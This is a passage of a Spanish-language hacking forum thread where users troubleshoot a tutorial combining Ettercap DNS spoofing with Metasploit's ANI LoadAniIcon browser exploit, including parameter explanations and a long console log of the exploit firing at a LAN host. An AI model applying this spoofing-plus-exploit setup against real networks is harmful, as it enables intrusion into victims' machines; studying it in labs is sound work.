elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  [Ettercap+Metasploit] Suplantación de identidad por nombre de dominio [Spoofing]
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] 3 Ir Abajo Respuesta Imprimir
Autor Tema: [Ettercap+Metasploit] Suplantación de identidad por nombre de dominio [Spoofing]  (Leído 29,576 veces)
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: [Ettercap+Metasploit] Suplantación de identidad por nombre de dominio [Spoofing]
« Respuesta #10 en: 13 Febrero 2010, 20:47 pm »

*: Representa al momento de ingresar a cualquier pagina
192.168.0.3:8080: Representa la URL Infectada con el exploit, mirad el parametro SRVPORT, podes cambiarlo.

shell root tiene buenas cualidades para sacarle provecho al 100% de las herramientas con las que cuenta.... felicidades eso hace mucha falta, alguien que haga mas con lo que ya esta hecho
:o
En línea

Te vendería mi talento por poder dormir tranquilo.
Debci
Wiki

Desconectado Desconectado

Mensajes: 2.021


Actualizate o muere!


Ver Perfil WWW
Re: [Ettercap+Metasploit] Suplantación de identidad por nombre de dominio [Spoofing]
« Respuesta #11 en: 13 Febrero 2010, 20:50 pm »

*: Representa al momento de ingresar a cualquier pagina
192.168.0.3:8080: Representa la URL Infectada con el exploit, mirad el parametro SRVPORT, podes cambiarlo.

shell root tiene buenas cualidades para sacarle provecho al 100% de las herramientas con las que cuenta.... felicidades eso hace mucha falta, alguien que haga mas con lo que ya esta hecho
:o
Por tanto:
192.168.0.3
es nuestra ip?

Saludos
En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: [Ettercap+Metasploit] Suplantación de identidad por nombre de dominio [Spoofing]
« Respuesta #12 en: 13 Febrero 2010, 21:02 pm »

Exacto, es el parametro SRVHOST, osea, 0.0.0.0 o IP Privada, de donde estamos realizando el ataque!
En línea

Te vendería mi talento por poder dormir tranquilo.
The Max

Desconectado Desconectado

Mensajes: 18


Ver Perfil
Re: [Ettercap+Metasploit] Suplantación de identidad por nombre de dominio [Spoofing]
« Respuesta #13 en: 3 Mayo 2010, 23:53 pm »

heu, muy buena conbinacion,
 tengo el siguiente problema miren:

Código:
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on eth1...
ERROR : 20, Not a directory
[src/ec_capture.c:src/ec_capture.c:146]

 pcap_open: Error opening adapter: El sistema no puede hallar el dispositivo especificado. (20)

como se que interfaz tengo que usar? o cual es el problema? ya probe con eth1,2,0 pero sale el mismo error

Pd: todo eso por la consola de windows .-
En línea

beholdthe


Desconectado Desconectado

Mensajes: 2.736


Ver Perfil
Re: [Ettercap+Metasploit] Suplantación de identidad por nombre de dominio [Spoofing]
« Respuesta #14 en: 20 Mayo 2010, 19:33 pm »

shellroot siempre hace cosas increibles, me encantan sus tutoriales de metasploit.
pero este metodo sirve para vista , 7  , o solo sirve para xp¿?¿
muchas gracias alex
En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: [Ettercap+Metasploit] Suplantación de identidad por nombre de dominio [Spoofing]
« Respuesta #15 en: 21 Mayo 2010, 03:50 am »

@beholdthe
Intenta printear la salida del comando
Código
  1. show targets

En ese exploit ani_loadimage_chunksize, en ese tiempo solo mostraba los siguientes targets
Código
  1. 0   (Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista

Saludos!
En línea

Te vendería mi talento por poder dormir tranquilo.
beholdthe


Desconectado Desconectado

Mensajes: 2.736


Ver Perfil
Re: [Ettercap+Metasploit] Suplantación de identidad por nombre de dominio [Spoofing]
« Respuesta #16 en: 21 Mayo 2010, 21:50 pm »

lo hare, tengo muchas ganas de probar esto, tengo que instalar un vista e intentar probarlo
un saludo
En línea

Søra

Desconectado Desconectado

Mensajes: 260

"Piensa por ti mismo"Antifascismo Antiracismo


Ver Perfil
Re: [Ettercap+Metasploit] Suplantación de identidad por nombre de dominio [Spoofing]
« Respuesta #17 en: 25 Mayo 2010, 19:42 pm »

Ola a todos veran a m me pasa el mismo problema si indico el puerto (en etter.dns) no hace la recireccion y si no lo indico pues mirad:


METASPLOIT:
Citar
msf exploit(ms07_017_ani_loadimage_chunksize) > exploit
msf exploit(ms07_017_ani_loadimage_chunksize) >
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3890...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3892...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3893...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3894...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3895...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3896...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3897...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3895...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3899...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3897...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 192.168.0.128:3899...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 192.168.0.128:3906...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 192.168.0.128:3907...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3921...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3921...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3921...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 192.168.0.128:3946...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3948...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3950...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 192.168.0.128:3951...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3921...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3959...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3971...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3921...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3975...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3983...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 192.168.0.128:3950...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3948...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3959...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3997...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3971...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3921...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3975...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3921...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3971...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3975...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3997...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3997...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3997...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4018...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3997...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 192.168.0.128:4018...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 192.168.0.128:3997...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 192.168.0.128:4029...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4033...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3921...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:3971...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4040...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4049...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4049...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4056...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4057...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4056...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4057...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4056...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4063...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4065...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4067...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4069...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4057...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4073...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4075...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4078...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4056...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4057...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4063...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 192.168.0.128:4084...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 192.168.0.128:4086...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4075...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4078...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4088...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4056...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4065...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4067...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4069...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 192.168.0.128:4090...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4092...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4095...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 192.168.0.128:4096...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4073...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4105...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4111...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4112...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4113...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4115...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4117...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4119...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4121...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4123...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4125...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4119...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4123...
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4125...
  • Attempting to exploit ani_loadimage_chunksize
  • Unknown User-Agent Microsoft BITS/6.7 from 192.168.0.128:4127
  • Attempting to exploit ani_loadimage_chunksize
  • Sending HTML page to 192.168.0.128:4132...
Interrupt: use the 'exit' command to quit

Alguno tiene idea???Saludos Søra.
En línea






Se busca sabio para intercambio:
Todo lo que se por la mitad de lo que desconozco.
thetorras

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: [Ettercap+Metasploit] Suplantación de identidad por nombre de dominio [Spoofing]
« Respuesta #18 en: 11 Febrero 2012, 11:08 am »

si sirve para windows 7 vista y xp
En línea

Eomen

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Re: [Ettercap+Metasploit] Suplantación de identidad por nombre de dominio [Spoofing]
« Respuesta #19 en: 21 Julio 2012, 18:32 pm »

Hola buenas,
Estoy siguiendo muchos tutoriales, de metasploit+ettercap...
El caso es que al cargar el exploit m17_017_ani_loadimage_chunksize, en el puerto 80. Al ejecutar el exploit, me sale el siguiente mensaje segun se carga:
[-] Exploit failed: Rex::AddressInUse The address is already in use (192.168.0.193:80)
Lo que vivene a decir que la direccione está en uso.
Si pruebo cargándolo en el 8080, el exploit se me carga completamente..., pero en el 80 (configurado como todos los tutoriales que he visto),me da ese problema.
Con respecto al ettercap, no me da ningún problema (siempre que no le ponga puerto de escucha, porque si le pongo el 8080 no me funciona) , lo único que cuando tengo el exploit lanzado en otro puerto y el etter a la escucha... Al intentar abrir una página para que me redireccione, ésta no se abre. Aunque sí que se refleja en el ettercap..
Si alguien sabe por qué tengo éstos problemas (aunque me imagino que necesitarán más información), a ver si me pueden ayudar.
Gracias y un saludo
« Última modificación: 21 Julio 2012, 18:56 pm por Eomen » En línea

Páginas: 1 [2] 3 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Boletin de elhacker.net marcado como Suplantacion de Identidad en Hotmail
Sugerencias y dudas sobre el Foro
Skeletron 7 4,422 Último mensaje 4 Julio 2009, 23:16 pm
por Skeletron
FACEBOOK. SUPLANTACION DE IDENTIDAD. AYUDA
Mensajería
Anne Jade 3 6,733 Último mensaje 2 Marzo 2011, 16:41 pm
por el-brujo
Suplantacion de identidad?
Foro Libre
ps3ps3ps3 5 3,944 Último mensaje 27 Enero 2012, 22:24 pm
por beholdthe
Suplantación identidad
Seguridad
ernie_aka 5 4,081 Último mensaje 13 Marzo 2012, 16:51 pm
por Elemental Code
Ningún ministerio español protege su dominio contra la suplantación de identidad
Noticias
wolfbcn 0 1,049 Último mensaje 8 Febrero 2019, 02:04 am
por wolfbcn
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines